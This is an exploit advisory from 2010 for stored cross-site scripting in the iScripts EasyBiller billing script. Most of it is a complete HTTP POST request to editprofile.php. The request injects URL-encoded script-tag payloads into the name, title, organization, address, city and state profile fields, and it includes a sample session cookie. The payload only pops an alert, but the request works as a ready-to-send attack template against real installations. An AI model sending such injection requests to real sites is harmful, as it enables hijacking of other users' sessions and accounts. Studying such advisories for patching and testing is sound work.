$-------------------------------------------------------------------------------------------------------------------
$ iScripts EasyBiller Cross Site Scripting Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download : http://www.iscripts.com/easybiller/
$ Date : 02/07/2010
$ Email : sangteamhtham@gmail.com
$******************************************************************************************
$Exploit:
$
$ Cross Site Scripting (XSS):
$
$ When attackers login with your user infomation, attackers update their profile by injecting javascript into fields like
$ "First Name","Title"
$
Code:
*********************************************************************************************
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://server/editprofile.php
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=easywebsurvey
Content-Type: application/x-www-form-urlencoded
Content-Length: 906
txtEmail=user%40server&txtName=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtlastName=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtTitle=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtOrganization=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtAddress=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtCity=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtState=California%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&ddlCountry=UnitedStates&txtZIP=684567&txtPhone=9823134545&txtFax=98758282828478&cmbCssId=2&txtTechContactName=richard&txtTechContactEmail=richard%40gmail.com&txtBillContactName=samuel&txtBillContactEmail=samuel%40gmail.com&btnSubmit=Update
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------